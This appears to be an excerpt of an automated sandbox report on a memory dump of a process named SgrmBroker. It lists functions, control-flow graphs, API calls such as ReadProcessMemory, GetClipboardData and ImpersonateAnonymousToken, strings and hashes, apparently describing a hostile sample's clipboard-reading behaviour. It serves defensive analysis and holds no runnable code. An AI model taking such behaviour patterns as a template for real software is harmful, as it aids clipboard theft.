                                                                                      • String ID: 0$WQLEmptyNullStringI1I2I4I8R4R8BoolUI1UI2UI4UI8ArrayObjectIUnknownWrapperinner
                                                                                      • API String ID: 364368470-1862106893
                                                                                      • Opcode ID: ad48cfbcf0ab5b7cae1183f92f651c627291acb3989c20c33f8edf5d5ce7bd5c
                                                                                      • Instruction ID: bbd6e8f7ea791b8522f9e3ee1ee0ca00d7b45bd521287e9e168f08bc2cdbd3eb
                                                                                      • Opcode Fuzzy Hash: ad48cfbcf0ab5b7cae1183f92f651c627291acb3989c20c33f8edf5d5ce7bd5c
                                                                                      • Instruction Fuzzy Hash: 76A1A322A0DB8181EB658F15A5403BDAB70FB95BD8F049232DE8E477A6DF3CE595C700
                                                                                      Function 00007FF6D9DCF160 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3890 7ff6d9dcf160-7ff6d9dcf17c 3891 7ff6d9dcf182-7ff6d9dcf19a 3890->3891 3892 7ff6d9dcf258-7ff6d9dcf25a 3890->3892 3891->3892 3893 7ff6d9dcf1a0-7ff6d9dcf1ba call 7ff6d9dc9960 3891->3893 3893->3892 3896 7ff6d9dcf1c0-7ff6d9dcf1ea ReadProcessMemory 3893->3896 3897 7ff6d9dcf1ec-7ff6d9dcf1f1 3896->3897 3898 7ff6d9dcf206-7ff6d9dcf217 GetLastError 3896->3898 3899 7ff6d9dcf1f3-7ff6d9dcf204 3897->3899 3900 7ff6d9dcf219-7ff6d9dcf21e 3897->3900 3901 7ff6d9dcf225-7ff6d9dcf240 HeapFree 3898->3901 3902 7ff6d9dcf246-7ff6d9dcf257 3899->3902 3900->3901 3901->3902
                                                                                      APIs
                                                                                      Strings
                                                                                      • ReadProcessMemory returned unexpected number of bytes readUnable to read process dataIntel x86MIPSRISC AlphaPPCSHXARMIntel Itanium-based x64RISC Alpha x64MSIL(Intel or AMD) x64Intel Itanium-based x86unknownARM x64CPU , xrefs: 00007FF6D9DCF21E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFreeHeapLastMemoryProcessRead
                                                                                      • String ID: ReadProcessMemory returned unexpected number of bytes readUnable to read process dataIntel x86MIPSRISC AlphaPPCSHXARMIntel Itanium-based x64RISC Alpha x64MSIL(Intel or AMD) x64Intel Itanium-based x86unknownARM x64CPU
                                                                                      • API String ID: 2093145822-811746041
                                                                                      • Opcode ID: 79e8c1a417f1afa2a78a02ba8c8650f5027d807980a54fb5341c9a1cc1e2f64e
                                                                                      • Instruction ID: 6e8d0a4e51e77b74faa24a3b9dd87ba3a8b00ecd5207726ef6b4abe19d11d612
                                                                                      • Opcode Fuzzy Hash: 79e8c1a417f1afa2a78a02ba8c8650f5027d807980a54fb5341c9a1cc1e2f64e
                                                                                      • Instruction Fuzzy Hash: D021A726709B4691E6609F52BC406BEA6A4FF597A4F844236EEADC77E0DF3CD061D300
                                                                                      Function 00007FF6D9DD0E00 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 4130 7ff6d9dd0e00-7ff6d9dd0e15 CoInitializeEx 4131 7ff6d9dd0e8d-7ff6d9dd0ead GetErrorInfo 4130->4131 4132 7ff6d9dd0e17-7ff6d9dd0e56 CoInitializeSecurity 4130->4132 4133 7ff6d9dd0eb5-7ff6d9dd0eb8 4131->4133 4134 7ff6d9dd0eaf 4131->4134 4135 7ff6d9dd0e88-7ff6d9dd0e8b 4132->4135 4136 7ff6d9dd0e58-7ff6d9dd0e78 GetErrorInfo 4132->4136 4137 7ff6d9dd0ebb-7ff6d9dd0ec1 4133->4137 4134->4133 4135->4137 4138 7ff6d9dd0e80-7ff6d9dd0e86 4136->4138 4139 7ff6d9dd0e7a 4136->4139 4138->4133 4138->4135 4139->4138
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorInfoInitialize$Security
                                                                                      • String ID:
                                                                                      • API String ID: 413594595-0
                                                                                      • Opcode ID: 84103676e15c0cf9c0dac99652f5b94c19bf42f2e318447df2893695f895a070
                                                                                      • Instruction ID: 71f059af7afda498085739e132a91ff85a3d5682fa5161cac4be9946b8f20e4d
                                                                                      • Opcode Fuzzy Hash: 84103676e15c0cf9c0dac99652f5b94c19bf42f2e318447df2893695f895a070
                                                                                      • Instruction Fuzzy Hash: FC112132B08B8183EB948F24E45432EB7A1FFC4B58F544236D69A87B94DFBDD4548B40
                                                                                      Function 00007FF6D9DD0570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalInfoMemoryPerformanceStatus
                                                                                      • String ID: @
                                                                                      • API String ID: 3163563144-2766056989
                                                                                      • Opcode ID: 569f5e5e4de5a2d1dbff4c1db82d7056d41f0377743af30d59fcf5673e13d7c0
                                                                                      • Instruction ID: ab9f39f42b037d413b4be86c8f9783595b9ba6ac550588818965f3df8466340b
                                                                                      • Opcode Fuzzy Hash: 569f5e5e4de5a2d1dbff4c1db82d7056d41f0377743af30d59fcf5673e13d7c0
                                                                                      • Instruction Fuzzy Hash: CF019011958DC192E2364F28E4463F6A3B5BFE4769F005311FAC941754EF7AD2A78B00
                                                                                      Function 00007FF6D9CFBF40 Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 4144 7ff6d9cfbf40-7ff6d9cfce85 call 7ff6d9dd0e00 CloseHandle * 2 4149 7ff6d9cfceb3-7ff6d9cfcebf CloseHandle 4144->4149 4150 7ff6d9cfce8c-7ff6d9cfce8f 4144->4150 4149->4150 4151 7ff6d9cfcecf-7ff6d9cfcede CloseHandle 4149->4151 4150->4151 4152 7ff6d9cfce99-7ff6d9cfceac 4150->4152 4151->4152 4153 7ff6d9cfcf0d-7ff6d9cfd2ed 4151->4153 4152->4149 4152->4153 4156 7ff6d9cfd2ef-7ff6d9cfd300 HeapFree 4153->4156 4157 7ff6d9cfd306-7ff6d9cfd310 4153->4157 4156->4157 4158 7ff6d9cfd325-7ff6d9cfd32f 4157->4158 4159 7ff6d9cfd312-7ff6d9cfd315 4157->4159 4161 7ff6d9cfd344-7ff6d9cfd34e 4158->4161 4162 7ff6d9cfd331-7ff6d9cfd334 4158->4162 4159->4158 4160 7ff6d9cfd317-7ff6d9cfd31f CloseHandle 4159->4160 4160->4158 4164 7ff6d9cfd363-7ff6d9cfd36e 4161->4164 4165 7ff6d9cfd350-7ff6d9cfd353 4161->4165 4162->4161 4163 7ff6d9cfd336-7ff6d9cfd33e CloseHandle 4162->4163 4163->4161 4166 7ff6d9cfd374-7ff6d9cfd387 4164->4166 4167 7ff6d9cfd69b-7ff6d9cfd6a4 4164->4167 4165->4164 4168 7ff6d9cfd355-7ff6d9cfd35d CloseHandle 4165->4168 4169 7ff6d9cfd422-7ff6d9cfd42f 4166->4169 4170 7ff6d9cfd38d-7ff6d9cfd390 4166->4170 4171 7ff6d9cfd6bd-7ff6d9cfd75e call 7ff6d9cfd6d0 4167->4171 4172 7ff6d9cfd6a6-7ff6d9cfd6b7 HeapFree 4167->4172 4168->4164 4175 7ff6d9cfd462-7ff6d9cfd465 4169->4175 4173 7ff6d9cfd392-7ff6d9cfd39c 4170->4173 4174 7ff6d9cfd40e-7ff6d9cfd414 4170->4174 4194 7ff6d9cfd77f-7ff6d9cfd811 call 7ff6d9cf1530 GetClipboardData GlobalLock GlobalSize WideCharToMultiByte 4171->4194 4172->4171 4178 7ff6d9cfd39e-7ff6d9cfd3a2 4173->4178 4179 7ff6d9cfd3bc-7ff6d9cfd3c0 4173->4179 4180 7ff6d9cfd41a-7ff6d9cfd41d 4174->4180 4181 7ff6d9cfd666-7ff6d9cfd66d 4174->4181 4182 7ff6d9cfd490-7ff6d9cfd493 4175->4182 4183 7ff6d9cfd467-7ff6d9cfd472 4175->4183 4189 7ff6d9cfd3b0-7ff6d9cfd3ba 4178->4189 4179->4174 4191 7ff6d9cfd3c2-7ff6d9cfd3ce 4179->4191 4192 7ff6d9cfd689-7ff6d9cfd695 HeapFree 4180->4192 4190 7ff6d9cfd670-7ff6d9cfd687 HeapFree 4181->4190 4187 7ff6d9cfd495-7ff6d9cfd49f 4182->4187 4188 7ff6d9cfd4c4-7ff6d9cfd4c7 4182->4188 4184 7ff6d9cfd540-7ff6d9cfd546 4183->4184 4185 7ff6d9cfd478-7ff6d9cfd47e 4183->4185 4199 7ff6d9cfd54c-7ff6d9cfd56d HeapFree 4184->4199 4200 7ff6d9cfd657-7ff6d9cfd664 call 7ff6d9d00ff0 4184->4200 4193 7ff6d9cfd56f-7ff6d9cfd572 4185->4193 4195 7ff6d9cfd4a1-7ff6d9cfd4a8 4187->4195 4196 7ff6d9cfd4c9-7ff6d9cfd4d0 4187->4196 4197 7ff6d9cfd51e-7ff6d9cfd52e 4188->4197 4189->4179 4189->4189 4190->4190 4190->4192 4198 7ff6d9cfd3d0-7ff6d9cfd40c 4191->4198 4192->4167 4201 7ff6d9cfd610-7ff6d9cfd615 4193->4201 4202 7ff6d9cfd578-7ff6d9cfd586 4193->4202 4234 7ff6d9d00f3e-7ff6d9d00f96 AddVectoredExceptionHandler SetThreadStackGuarantee GetCurrentThread SetThreadDescription call 7ff6d9dc9960 4194->4234 4235 7ff6d9cfd817-7ff6d9cfd842 call 7ff6d9d29420 4194->4235 4205 7ff6d9cfd4b0-7ff6d9cfd4ba 4195->4205 4196->4197 4206 7ff6d9cfd4d2 4196->4206 4197->4185 4207 7ff6d9cfd534 4197->4207 4198->4174 4198->4198 4199->4184 4199->4193 4200->4181 4213 7ff6d9cfd618-7ff6d9cfd62c 4201->4213 4208 7ff6d9cfd5fe-7ff6d9cfd601 4202->4208 4209 7ff6d9cfd588-7ff6d9cfd58f 4202->4209 4205->4205 4212 7ff6d9cfd4bc-7ff6d9cfd4c0 4205->4212 4214 7ff6d9cfd4e0-7ff6d9cfd51c 4206->4214 4207->4184 4208->4213 4215 7ff6d9cfd5b5-7ff6d9cfd5bd 4209->4215 4216 7ff6d9cfd591-7ff6d9cfd594 4209->4216 4212->4214 4218 7ff6d9cfd4c2 4212->4218 4219 7ff6d9cfd62e-7ff6d9cfd636 4213->4219 4220 7ff6d9cfd639-7ff6d9cfd63e 4213->4220 4214->4197 4214->4214 4215->4208 4222 7ff6d9cfd5bf 4215->4222 4221 7ff6d9cfd5a0-7ff6d9cfd5aa 4216->4221 4218->4197 4219->4220 4224 7ff6d9cfd644-7ff6d9cfd649 4220->4224 4225 7ff6d9cfd458-7ff6d9cfd460 4220->4225 4221->4221 4228 7ff6d9cfd5ac-7ff6d9cfd5b2 4221->4228 4229 7ff6d9cfd5c0-7ff6d9cfd5fc 4222->4229 4226 7ff6d9cfd440-7ff6d9cfd443 4224->4226 4227 7ff6d9cfd64f-7ff6d9cfd652 4224->4227 4225->4174 4225->4175 4232 7ff6d9cfd447-7ff6d9cfd455 HeapFree 4226->4232 4227->4232 4228->4215 4229->4208 4229->4229 4232->4225 4240 7ff6d9d00f9a-7ff6d9d00fbb 4234->4240 4241 7ff6d9d00f98 4234->4241 4235->4234 4242 7ff6d9cfd848-7ff6d9cfd87c WideCharToMultiByte 4235->4242 4243 7ff6d9d00fc0-7ff6d9d00fc4 4240->4243 4241->4240 4244 7ff6d9cfd880-7ff6d9cfd885 4242->4244 4243->4241 4245 7ff6d9d00fc6-7ff6d9d00fd3 4243->4245 4246 7ff6d9cfd892-7ff6d9cfd8cb GlobalUnlock GetCurrentThread ImpersonateAnonymousToken CloseClipboard 4244->4246 4247 7ff6d9cfd887-7ff6d9cfd88d 4244->4247 4245->4243 4250 7ff6d9d00fd5-7ff6d9d00fe2 call 7ff6d9db9a40 call 7ff6d9cfbf40 4245->4250 4251 7ff6d9cfd8d3-7ff6d9cfd8de 4246->4251 4252 7ff6d9cfd8cd RevertToSelf 4246->4252 4247->4244 4248 7ff6d9cfd88f 4247->4248 4248->4246 4261 7ff6d9d00fe7-7ff6d9d00ff7 4250->4261 4254 7ff6d9cfd8f2-7ff6d9cfd8f5 4251->4254 4255 7ff6d9cfd8e0-7ff6d9cfd8ec HeapFree 4251->4255 4252->4251 4257 7ff6d9cfd912-7ff6d9cfd915 4254->4257 4258 7ff6d9cfd8f7-7ff6d9cfd90c call 7ff6d9dd4ee0 4254->4258 4255->4254 4257->4234 4262 7ff6d9cfd91b-7ff6d9cfd935 call 7ff6d9dc9960 4257->4262 4258->4257 4268 7ff6d9cfda1a 4258->4268 4266 7ff6d9d00ffd-7ff6d9d01006 HeapFree 4261->4266 4267 7ff6d9d00ff9 4261->4267 4262->4234 4274 7ff6d9cfd93b-7ff6d9cfdaf9 call 7ff6d9dd4fe0 4262->4274 4267->4266 4270 7ff6d9cfda1f-7ff6d9cfda34 CreateWaitableTimerExW 4268->4270 4272 7ff6d9cfda3a-7ff6d9cfda6e SetWaitableTimer 4270->4272 4273 7ff6d9cfd769-7ff6d9cfd77a Sleep 4270->4273 4276 7ff6d9cfda74-7ff6d9cfdaa9 WaitForSingleObject CloseHandle 4272->4276 4273->4194 4280 7ff6d9cfdb12-7ff6d9cfdb28 4274->4280 4281 7ff6d9cfdafb-7ff6d9cfdb0c HeapFree 4274->4281 4276->4194 4277 7ff6d9cfdaaf 4276->4277 4277->4273 4280->4270 4281->4280
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleInitialize$ErrorInfoSecurity
                                                                                      • String ID:
                                                                                      • API String ID: 1445471777-0
                                                                                      • Opcode ID: 6aab80cf292e4e8fd16ad849ef27c9ba43182dc39c57004028da022426039bcd
                                                                                      • Instruction ID: 1b4b9161bd395ba0749fc76d3b5ffb03c51f61b93554cbddccb8c6a07fa874d2
                                                                                      • Opcode Fuzzy Hash: 6aab80cf292e4e8fd16ad849ef27c9ba43182dc39c57004028da022426039bcd
                                                                                      • Instruction Fuzzy Hash: 2221332164DAC181EA659F15A4447BEA770FB85BC8F080536EE8D93799DF7CE854CB00
                                                                                      Function 00007FF6D9DC62E0 Relevance: 4.6, APIs: 3, Instructions: 81memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 4283 7ff6d9dc62e0-7ff6d9dc6312 call 7ff6d9dbbe40 4286 7ff6d9dc6314-7ff6d9dc6344 call 7ff6d9dc6400 4283->4286 4287 7ff6d9dc6346-7ff6d9dc634e 4283->4287 4286->4287 4295 7ff6d9dc63ad-7ff6d9dc63be GetFileAttributesW 4286->4295 4289 7ff6d9dc6350-7ff6d9dc635e 4287->4289 4290 7ff6d9dc639e 4287->4290 4292 7ff6d9dc6360 4289->4292 4293 7ff6d9dc6365-7ff6d9dc636d 4289->4293 4294 7ff6d9dc63a1-7ff6d9dc63ac 4290->4294 4292->4293 4296 7ff6d9dc636f-7ff6d9dc6374 4293->4296 4297 7ff6d9dc638c-7ff6d9dc6398 HeapFree 4293->4297 4298 7ff6d9dc63c0-7ff6d9dc63cb 4295->4298 4299 7ff6d9dc63cd-7ff6d9dc63d3 4295->4299 4300 7ff6d9dc6376 4296->4300 4301 7ff6d9dc637a-7ff6d9dc6386 HeapFree 4296->4301 4297->4290 4298->4294 4299->4294 4302 7ff6d9dc63d5-7ff6d9dc63ec HeapFree 4299->4302 4300->4301 4301->4297
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3036504266-0
                                                                                      • Opcode ID: 711160d68c01a0a94b1d0b0fe4e9dd2eddc9c53794f6f8bcfee0a48aa784fba0
                                                                                      • Instruction ID: a6463e98822af2870a6fa99ee44f42d2a95bd7eff0fec6202eeac08008b73f0f
                                                                                      • Opcode Fuzzy Hash: 711160d68c01a0a94b1d0b0fe4e9dd2eddc9c53794f6f8bcfee0a48aa784fba0
                                                                                      • Instruction Fuzzy Hash: F3315032619E4281EA50DF46E98027DA7A1FF88BE0F584132EF9D877A5DF3CD4A58700
                                                                                      Function 00007FF6D9DE5CA0 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastWait
                                                                                      • String ID:
                                                                                      • API String ID: 1574541344-0
                                                                                      • Opcode ID: 906d77ec4609f9c89403226676852f1871326fbcd733ffda98eb71f3acd58e0b
                                                                                      • Instruction ID: 5e48b8d69df8809eb8b2f04930dd0451a491aa41777db65e1181474b9a1f5f5b
                                                                                      • Opcode Fuzzy Hash: 906d77ec4609f9c89403226676852f1871326fbcd733ffda98eb71f3acd58e0b
                                                                                      • Instruction Fuzzy Hash: 61210532F2C94286FE658F55986567DA790EB80788F148236EE8ECB694DF3CD452C700
                                                                                      Function 00007FF6D9CF1000 Relevance: 3.1, APIs: 2, Instructions: 119memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorHeapInfo$AllocateFree
                                                                                      • String ID:
                                                                                      • API String ID: 616119989-0
                                                                                      • Opcode ID: 14512c9256ce93294a77ff1d72d43d30a4d10f785fe9ef1d73284d1a9dbc45b0
                                                                                      • Instruction ID: 63c284c4c03428e9843e4f57856c90d414ae83676d210d45c407bcc729932639
                                                                                      • Opcode Fuzzy Hash: 14512c9256ce93294a77ff1d72d43d30a4d10f785fe9ef1d73284d1a9dbc45b0
                                                                                      • Instruction Fuzzy Hash: C3513C22A1DBC586E7618F29E0503BEB7B0FB95784F049126EBC982A55DF7CE194CB00
                                                                                      Function 00007FF6D9DCF260 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArgvCommandFreeLineLocal
                                                                                      • String ID:
                                                                                      • API String ID: 1203019955-0
                                                                                      • Opcode ID: 4525067bc7c2f5b3cd31977544e1d12bd885af8047d75d9ac125cc80de0722f7
                                                                                      • Instruction ID: d9d6135d88e95b3ff9e15b09e0b68a2a5482fab62bf2fb1ba4389a1acff0434c
                                                                                      • Opcode Fuzzy Hash: 4525067bc7c2f5b3cd31977544e1d12bd885af8047d75d9ac125cc80de0722f7
                                                                                      • Instruction Fuzzy Hash: 8E31F423A18F4181E6609F15B4003AEA7A0F7897E8F544326FE9D46B95DF3CE195C700
                                                                                      Function 00007FF6D9DC9D80 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlReAllocateHeap.NTDLL(?,00000004,00000000,00007FF6D9DE13D3,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF6D9DC9DAD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: d329bc0e64fd8a024a668f78104d430894fac2d2b05c6bd576099672412e579f
                                                                                      • Instruction ID: 9da97949c3b3a1aa797fa23dd28a3562fcfc767278a9e19f1259aed437ae09f6
                                                                                      • Opcode Fuzzy Hash: d329bc0e64fd8a024a668f78104d430894fac2d2b05c6bd576099672412e579f
                                                                                      • Instruction Fuzzy Hash: 52119362B1EE5182FF599F22A94437C62956F1CB90F58413BD90EC77C9DF3CA4728200
                                                                                      Function 00007FF6D9DD99C4 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHeap
                                                                                      • String ID:
                                                                                      • API String ID: 4292702814-0
                                                                                      • Opcode ID: 139c110e512aa45cd99778754ca668d349db15151d8707a6c8d56c6a4a81640d
                                                                                      • Instruction ID: 41e627328e887c160779b5af6df2352ab9bca35a549ef3ead27f9edc1e5fd8fe
                                                                                      • Opcode Fuzzy Hash: 139c110e512aa45cd99778754ca668d349db15151d8707a6c8d56c6a4a81640d
